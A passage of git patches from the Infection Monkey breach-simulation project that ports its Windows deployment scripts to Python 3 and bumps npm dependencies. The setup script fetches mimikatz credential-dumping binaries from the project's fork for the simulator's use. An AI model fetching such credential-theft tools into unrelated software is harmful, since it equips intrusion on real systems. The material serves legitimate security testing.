From 9a21a50fd16a207fa278dedd0c1f1e0122aa1810 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 26 Sep 2019 10:53:25 +0300 Subject: [PATCH 01/53] Windows deployment scripts to python3 --- deployment_scripts/config.ps1 | 5 +---- deployment_scripts/deploy_windows.ps1 | 13 ++++--------- 2 files changed, 5 insertions(+), 13 deletions(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index 07be64612..4fee48e09 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -3,7 +3,7 @@ $MONKEY_FOLDER_NAME = "infection_monkey" # Url of public git repository that contains monkey's source code $MONKEY_GIT_URL = "https://github.com/guardicore/monkey" # Link to the latest python download or install it manually -$PYTHON_URL = "https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi" +$PYTHON_URL = "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe" # Monkey binaries $LINUX_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32" @@ -33,14 +33,11 @@ $TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" $TEMP_UPX_ZIP = "upx.zip" -$TEMP_VC_FOR_PYTHON27_INSTALLER = "vcforpython.msi" $UPX_FOLDER = "upx394w" # Other url's -$VC_FOR_PYTHON27_URL = "https://download.microsoft.com/download/7/9/6/796EF2E4-801B-4FC4-AB28-B59FBF6D907B/VCForPython27.msi" $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" -$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" $UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 17d08ecc8..1bfb62445 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -44,15 +44,15 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, try { $version = cmd.exe /c '"python" --version 2>&1' - if ( $version -like 'Python 2.7.*' ) { - "Python 2.7.* was found, installing dependancies" + if ( $version -like 'Python 3.*' ) { + "Python 3.* was found, installing dependencies" } else { throw System.Management.Automation.CommandNotFoundException } } catch [System.Management.Automation.CommandNotFoundException] { - "Downloading python 2.7 ..." + "Downloading python 3 ..." $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -69,7 +69,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source) # Get vcforpython27 before installing requirements - "Downloading Visual C++ Compiler for Python 2.7 ..." + "Downloading Visual C++ Compiler for Python 3 ..." $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER) Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -115,11 +115,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP - # Download and install C++ redistributable - "Downloading C++ redistributable ..." - $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER) - Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop - Remove-Item $TEMP_CPP_INSTALLER # Generate ssl certificate "Generating ssl certificate" From 2af17bc37193e6d1dad4addf0146265e67566199 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 2 Oct 2019 10:15:53 +0300 Subject: [PATCH 02/53] Windows deployment scripts to python3 --- deployment_scripts/config.ps1 | 18 +++++------- deployment_scripts/deploy_windows.ps1 | 35 +++++------------------ monkey/infection_monkey/build_windows.bat | 2 +- monkey/infection_monkey/monkey.spec | 12 +------- monkey/monkey_island/requirements.txt | 4 +-- 5 files changed, 18 insertions(+), 53 deletions(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index 4fee48e09..a3dafc66e 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -22,24 +22,20 @@ $SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so" # Other directories and paths ( most likely you dont need to configure) $MONKEY_ISLAND_DIR = "\monkey\monkey_island" $MONKEY_DIR = "\monkey\infection_monkey" -$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner" +$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\bin" $PYTHON_DLL = "C:\Windows\System32\python27.dll" -$MK32_DLL = "mk32.dll" -$MK64_DLL = "mk64.dll" -$TEMP_PYTHON_INSTALLER = ".\python.msi" +$MK32_DLL = "mk32.zip" +$MK64_DLL = "mk64.zip" +$TEMP_PYTHON_INSTALLER = ".\python.exe" $TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip" -$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" -$TEMP_UPX_ZIP = "upx.zip" -$UPX_FOLDER = "upx394w" # Other url's $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" -$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" -$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" -$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.dll" -$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.dll" +$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe" +$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip" +$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 1bfb62445..c7192a4c8 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -53,6 +53,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, catch [System.Management.Automation.CommandNotFoundException] { "Downloading python 3 ..." + "Select 'add to PATH' when installing" $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -60,23 +61,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, # Check if installed correctly $version = cmd.exe /c '"python" --version 2>&1' if ( $version -like '* is not recognized*' ) { - "Python is not found in PATH. Add it manually or reinstall python." + "Python is not found in PATH. If you just installed python you need to restart cmd. + Else, add it manually or reinstall python." return } } - # Set python home dir - $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source) - - # Get vcforpython27 before installing requirements - "Downloading Visual C++ Compiler for Python 3 ..." - $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER) - Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop - $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") - Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER - - # Install requirements for island - $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop "Upgrading pip..." $output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1' $output @@ -84,8 +74,11 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Make sure pip module is installed and re-run this script." return } + + "Installing python packages for island" + $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop & python -m pip install --user -r $islandRequirements - # Install requirements for monkey + "Installing python packages for monkey" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" & python -m pip install --user -r $monkeyRequirements @@ -115,7 +108,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP - # Generate ssl certificate "Generating ssl certificate" Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR) @@ -167,19 +159,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue - # Download upx - if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ - "Downloading upx ..." - $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) - "Unzipping upx" - Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue - Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir - # Remove unnecessary files - Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER) - "Removing zip file" - Remove-Item $TEMP_UPX_ZIP - } - # Download mimikatz binaries $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL if(!(Test-Path -Path $mk32_path )){ diff --git a/monkey/infection_monkey/build_windows.bat b/monkey/infection_monkey/build_windows.bat index e5ff5a805..e2bf2935e 100644 --- a/monkey/infection_monkey/build_windows.bat +++ b/monkey/infection_monkey/build_windows.bat @@ -1 +1 @@ -pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec \ No newline at end of file +pyinstaller -F --log-level=DEBUG --clean --noupx monkey.spec diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index d29adddb1..e35fd2630 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -67,17 +67,11 @@ def process_datas(orig_datas): def get_binaries(): - binaries = get_windows_only_binaries() if is_windows() else get_linux_only_binaries() + binaries = [] if is_windows() else get_linux_only_binaries() binaries += get_sc_binaries() return binaries -def get_windows_only_binaries(): - binaries = [] - binaries += get_msvcr() - return binaries - - def get_linux_only_binaries(): binaries = [] binaries += get_traceroute_binaries() @@ -92,10 +86,6 @@ def get_sc_binaries(): return [(x, get_bin_file_path(x), 'BINARY') for x in ['sc_monkey_runner32.so', 'sc_monkey_runner64.so']] -def get_msvcr(): - return [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')] - - def get_traceroute_binaries(): traceroute_name = 'traceroute32' if is_32_bit() else 'traceroute64' return [(traceroute_name, get_bin_file_path(traceroute_name), 'BINARY')] diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt index e6d81e6aa..57ca79348 100644 --- a/monkey/monkey_island/requirements.txt +++ b/monkey/monkey_island/requirements.txt @@ -1,6 +1,6 @@ bson python-dateutil -tornado==5.1.1 +tornado werkzeug jinja2 markupsafe @@ -10,7 +10,7 @@ flask Flask-Pymongo Flask-Restful Flask-JWT -jsonschema==2.6.0 +jsonschema netifaces ipaddress enum34 From fabcd4c9df0ac77e3ac45821ba81a7bab3164741 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 3 Oct 2019 12:40:58 +0300 Subject: [PATCH 03/53] Removed enum34 from requirements --- .../infection_monkey/requirements_windows.txt | 2 - monkey/monkey_island/cc/ui/package-lock.json | 101 +++++++++--------- monkey/monkey_island/cc/ui/package.json | 14 +-- monkey/monkey_island/requirements.txt | 1 - 4 files changed, 57 insertions(+), 61 deletions(-) diff --git a/monkey/infection_monkey/requirements_windows.txt b/monkey/infection_monkey/requirements_windows.txt index ce5021923..cb3f43660 100644 --- a/monkey/infection_monkey/requirements_windows.txt +++ b/monkey/infection_monkey/requirements_windows.txt @@ -1,4 +1,3 @@ -enum34 impacket pycryptodome cffi @@ -15,4 +14,3 @@ wmi pywin32 pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/cc/ui/package-lock.json b/monkey/monkey_island/cc/ui/package-lock.json index 14e547416..b402cad83 100644 --- a/monkey/monkey_island/cc/ui/package-lock.json +++ b/monkey/monkey_island/cc/ui/package-lock.json @@ -2731,7 +2731,7 @@ "dev": true, "requires": { "bluebird": "3.5.5", - "chownr": "1.1.2", + "chownr": "1.1.3", "figgy-pudding": "3.5.1", "glob": "7.1.4", "graceful-fs": "4.2.2", @@ -2759,7 +2759,7 @@ "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", "dev": true, "requires": { - "yallist": "3.0.3" + "yallist": "3.1.1" } }, "y18n": { @@ -2769,9 +2769,9 @@ "dev": true }, "yallist": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.0.3.tgz", - "integrity": "sha512-S+Zk8DEWE6oKpV+vI3qWkaK+jSbIK86pCwe2IF/xwIpQ8jEuxpw9NyaGjmp9+BoJv5FV2piqCDcoCtStppiq2A==", + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", "dev": true } } @@ -2945,9 +2945,9 @@ } }, "chownr": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.2.tgz", - "integrity": "sha512-GkfeAQh+QNy3wquu9oIZr6SS5x7wGdSgNQvD10X3r+AZr1Oys22HW8kAmDMvNg2+Dm0TeGaEuO8gFwdBXxwO8A==", + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.3.tgz", + "integrity": "sha512-i70fVHhmV3DtTl6nqvZOnIjbY0Pe4kAUjwHj8z0zAdgBtYrJyYwLKCCuRBQ5ppkyL0AkN7HKRnETdmdp1zqNXw==", "dev": true }, "chrome-trace-event": { @@ -5117,9 +5117,9 @@ } }, "eslint-plugin-react": { - "version": "7.14.3", - "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.14.3.tgz", - "integrity": "sha512-EzdyyBWC4Uz2hPYBiEJrKCUi2Fn+BJ9B/pJQcjw5X+x/H2Nm59S4MJIvL4O5NEE0+WbnQwEBxWY03oUk+Bc3FA==", + "version": "7.15.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.15.1.tgz", + "integrity": "sha512-YotSItgMPwLGlr3df44MGVyXnHkmKcpkHTzpte3QwJtocr3nFqCXCuoxFZeBtnT8RHdj038NlTvam3dcAFrMcA==", "dev": true, "requires": { "array-includes": "3.0.3", @@ -5652,9 +5652,9 @@ "optional": true }, "filepond": { - "version": "4.7.1", - "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.1.tgz", - "integrity": "sha512-AxZBhsGS9QEJfbLiASUJMuS3hLhq/HbkKaJx1gKYCQ0lbs/OfciKKdeFbtAVKk0o9o6DcITw2C+QqFcTP1QBCg==" + "version": "4.7.2", + "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.2.tgz", + "integrity": "sha512-OqG35MnmvrGnq2KgHO0PS8uujzRqQL/bMlSy0StqRn6RRAM6wBM9gzQl22IvWLwMyw6g8aIZTZAhMaiTS1LZsA==" }, "fill-range": { "version": "2.2.3", @@ -6362,7 +6362,7 @@ "bundled": true, "dev": true, "requires": { - "inherits": "~2.0.0" + "inherits": "2.0.3" } }, "boom": { @@ -6485,7 +6485,7 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "extend": { @@ -6695,14 +6695,13 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "jsbn": { "version": "0.1.1", "bundled": true, - "dev": true, - "optional": true + "dev": true }, "json-schema": { "version": "0.2.3", @@ -6716,7 +6715,7 @@ "dev": true, "optional": true, "requires": { - "jsonify": "~0.0.0" + "jsonify": "0.0.0" } }, "json-stringify-safe": { @@ -15577,9 +15576,9 @@ } }, "react": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react/-/react-16.9.0.tgz", - "integrity": "sha512-+7LQnFBwkiw+BobzOF6N//BdoNw0ouwmSJTEm9cglOOmsg/TMiFHZLe2sEoN5M7LgJTj9oHH0gxklfnQe66S1w==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react/-/react-16.10.1.tgz", + "integrity": "sha512-2bisHwMhxQ3XQz4LiJJwG3360pY965pTl/MRrZYxIBKVj4fOHoDs5aZAkYXGxDRO1Li+SyjTAilQEbOmtQJHzA==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", @@ -15667,14 +15666,14 @@ } }, "react-dom": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.9.0.tgz", - "integrity": "sha512-YFT2rxO9hM70ewk9jq0y6sQk8cL02xm4+IzYBz75CQGlClQQ1Bxq0nhHF6OtSbit+AIahujJgb/CPRibFkMNJQ==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.10.1.tgz", + "integrity": "sha512-SmM4ZW0uug0rn95U8uqr52I7UdNf6wdGLeXDmNLfg3y5q5H9eAbdjF5ubQc3bjDyRrvdAB2IKG7X0GzSpnn5Mg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", "prop-types": "15.7.2", - "scheduler": "0.15.0" + "scheduler": "0.16.1" } }, "react-event-timeline": { @@ -15719,9 +15718,9 @@ } }, "react-hot-loader": { - "version": "4.12.13", - "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.13.tgz", - "integrity": "sha512-4Byk3aVQhcmTnVCBvDHOEOUnMFMj81r2yRKZQSfLOG2yd/4hm/A3oK15AnCZilQExqSFSsHcK64lIIU+dU2zQQ==", + "version": "4.12.14", + "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.14.tgz", + "integrity": "sha512-ecxH4eBvEaJ9onT8vkEmK1FAAJUh1PqzGqds9S3k+GeihSp7nKAp4fOxytO+Ghr491LiBD38jaKyDXYnnpI9pQ==", "dev": true, "requires": { "fast-levenshtein": "2.0.6", @@ -15746,7 +15745,7 @@ "integrity": "sha512-0XsbTXxgiaCDYDIWFcwkmerZPSwywfUqYmwT4jzewKTQSWoE6FCMoUVOeBJWK3E/CrWbxRG3m5GzY4lnIwGRBA==", "dev": true, "requires": { - "react-is": "16.9.0" + "react-is": "16.10.1" } }, "json5": { @@ -15770,9 +15769,9 @@ } }, "react-is": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.9.0.tgz", - "integrity": "sha512-tJBzzzIgnnRfEm046qRcURvwQnZVXmuCbscxUO5RWrGTXpon2d4c8mI0D8WE6ydVIm29JiLB6+RslkIvym9Rjw==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.10.1.tgz", + "integrity": "sha512-BXUMf9sIOPXXZWqr7+c5SeOKJykyVr2u0UDzEf4LNGc6taGkQe1A9DFD07umCIXz45RLr9oAAwZbAJ0Pkknfaw==", "dev": true }, "source-map": { @@ -16008,9 +16007,9 @@ } }, "react-toggle": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.0.2.tgz", - "integrity": "sha512-EPTWnN7gQHgEAUEmjheanZXNzY5TPnQeyyHfEs3YshaiWZf5WNjfYDrglO5F1Hl/dNveX18i4l0grTEsYH2Ccw==", + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.1.1.tgz", + "integrity": "sha512-+wXlMcSpg8SmnIXauMaZiKpR+r2wp2gMUteroejp2UTSqGTVvZLN+m9EhMzFARBKEw7KpQOwzCyfzeHeAndQGw==", "requires": { "classnames": "2.2.6" } @@ -16706,9 +16705,9 @@ } }, "scheduler": { - "version": "0.15.0", - "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.15.0.tgz", - "integrity": "sha512-xAefmSfN6jqAa7Kuq7LIJY0bwAPG3xlCj0HMEBQk1lxYiDKZscY2xJ5U/61ZTrYbmNQbXa+gc7czPkVo11tnCg==", + "version": "0.16.1", + "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.16.1.tgz", + "integrity": "sha512-MIuie7SgsqMYOdCXVFZa8SKoNorJZUWHW8dPgto7uEHn1lX3fg2Gu0TzgK8USj76uxV7vB5eRMnZs/cdEHg+cg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1" @@ -17936,20 +17935,20 @@ } }, "terser": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.1.tgz", - "integrity": "sha512-pnzH6dnFEsR2aa2SJaKb1uSCl3QmIsJ8dEkj0Fky+2AwMMcC9doMqLOQIH6wVTEKaVfKVvLSk5qxPBEZT9mywg==", + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.4.tgz", + "integrity": "sha512-Kcrn3RiW8NtHBP0ssOAzwa2MsIRQ8lJWiBG/K7JgqPlomA3mtb2DEmp4/hrUA+Jujx+WZ02zqd7GYD+QRBB/2Q==", "dev": true, "requires": { - "commander": "2.20.0", + "commander": "2.20.1", "source-map": "0.6.1", "source-map-support": "0.5.13" }, "dependencies": { "commander": { - "version": "2.20.0", - "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.0.tgz", - "integrity": "sha512-7j2y+40w61zy6YC2iRNpUe/NwhNyoXrYpHMrSunaMG64nRnaf96zO/KMQR4OyN/UnE5KLyEBnKHd4aG3rskjpQ==", + "version": "2.20.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.1.tgz", + "integrity": "sha512-cCuLsMhJeWQ/ZpsFTbE765kvVfoeSddc4nU3up4fV+fDBcfUXnbITJ+JzhkdjzOqhURjZgujxaioam4RM9yGUg==", "dev": true }, "source-map": { @@ -17982,7 +17981,7 @@ "schema-utils": "1.0.0", "serialize-javascript": "1.9.1", "source-map": "0.6.1", - "terser": "4.3.1", + "terser": "4.3.4", "webpack-sources": "1.4.3", "worker-farm": "1.7.0" }, @@ -19710,9 +19709,9 @@ } }, "webpack": { - "version": "4.40.2", - "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.40.2.tgz", - "integrity": "sha512-5nIvteTDCUws2DVvP9Qe+JPla7kWPPIDFZv55To7IycHWZ+Z5qBdaBYPyuXWdhggTufZkQwfIK+5rKQTVovm2A==", + "version": "4.41.0", + "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.41.0.tgz", + "integrity": "sha512-yNV98U4r7wX1VJAj5kyMsu36T8RPPQntcb5fJLOsMz/pt/WrKC0Vp1bAlqPLkA1LegSwQwf6P+kAbyhRKVQ72g==", "dev": true, "requires": { "@webassemblyjs/ast": "1.8.5", diff --git a/monkey/monkey_island/cc/ui/package.json b/monkey/monkey_island/cc/ui/package.json index aa85164ce..6743638d5 100644 --- a/monkey/monkey_island/cc/ui/package.json +++ b/monkey/monkey_island/cc/ui/package.json @@ -37,7 +37,7 @@ "css-loader": "^1.0.1", "eslint": "^5.16.0", "eslint-loader": "^2.2.1", - "eslint-plugin-react": "^7.14.3", + "eslint-plugin-react": "^7.15.1", "file-loader": "^1.1.11", "glob": "^7.1.4", "html-loader": "^0.5.5", @@ -56,11 +56,11 @@ "phantomjs-prebuilt": "^2.1.16", "react-addons-test-utils": "^15.6.2", "react-event-timeline": "^1.6.3", - "react-hot-loader": "^4.12.13", + "react-hot-loader": "^4.12.14", "rimraf": "^2.7.1", "style-loader": "^0.22.1", "url-loader": "^1.1.2", - "webpack": "^4.40.2", + "webpack": "^4.41.0", "webpack-cli": "^3.3.9", "webpack-dev-server": "^3.8.1" }, @@ -74,7 +74,7 @@ "downloadjs": "^1.4.7", "fetch": "^1.1.0", "file-saver": "^2.0.2", - "filepond": "^4.7.1", + "filepond": "^4.7.2", "js-file-download": "^0.4.8", "json-loader": "^0.5.7", "jwt-decode": "^2.2.0", @@ -85,13 +85,13 @@ "pluralize": "^7.0.0", "prop-types": "^15.7.2", "rc-progress": "^2.5.2", - "react": "^16.9.0", + "react": "^16.10.1", "react-bootstrap": "^0.32.4", "react-copy-to-clipboard": "^5.0.1", "react-data-components": "^1.2.0", "react-desktop-notification": "^1.0.9", "react-dimensions": "^1.3.0", - "react-dom": "^16.9.0", + "react-dom": "^16.10.1", "react-fa": "^5.0.0", "react-filepond": "^7.0.1", "react-graph-vis": "^1.0.2", @@ -101,7 +101,7 @@ "react-router-dom": "^4.3.1", "react-spinners": "^0.5.13", "react-table": "^6.10.3", - "react-toggle": "^4.0.1", + "react-toggle": "^4.1.1", "react-tooltip-lite": "^1.10.0", "redux": "^4.0.4", "sass-loader": "^7.3.1", diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt index 57ca79348..a2e734324 100644 --- a/monkey/monkey_island/requirements.txt +++ b/monkey/monkey_island/requirements.txt @@ -13,7 +13,6 @@ Flask-JWT jsonschema netifaces ipaddress -enum34 pycryptodome boto3 botocore From 04d8f1341bd07e93e50d11b93454ff2c0649f887 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 3 Oct 2019 17:20:14 +0300 Subject: [PATCH 04/53] Fixed bug that caused PATH not to be refreshed after python installation --- deployment_scripts/deploy_windows.ps1 | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index c7192a4c8..87d6bc8cf 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -56,13 +56,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Select 'add to PATH' when installing" $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop - $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User") Remove-Item $TEMP_PYTHON_INSTALLER # Check if installed correctly $version = cmd.exe /c '"python" --version 2>&1' if ( $version -like '* is not recognized*' ) { - "Python is not found in PATH. If you just installed python you need to restart cmd. - Else, add it manually or reinstall python." + "Python is not found in PATH. Add it to PATH and relaunch the script." return } } From 58ecb83977c1e87e04e4dad97a6187f5b41bf2db Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 7 Oct 2019 09:53:18 +0300 Subject: [PATCH 05/53] Added C++ redistributable required for windows and brought back UPX --- deployment_scripts/config.ps1 | 5 +++++ deployment_scripts/deploy_windows.ps1 | 19 +++++++++++++++++++ monkey/infection_monkey/build_windows.bat | 2 +- monkey/infection_monkey/monkey.spec | 1 + 4 files changed, 26 insertions(+), 1 deletion(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index a3dafc66e..095f7b899 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -29,13 +29,18 @@ $MK64_DLL = "mk64.zip" $TEMP_PYTHON_INSTALLER = ".\python.exe" $TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip" +$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" +$TEMP_UPX_ZIP = "upx.zip" +$UPX_FOLDER = "upx394w" # Other url's $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" +$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe" $MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip" $MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip" +$UPX_URL = 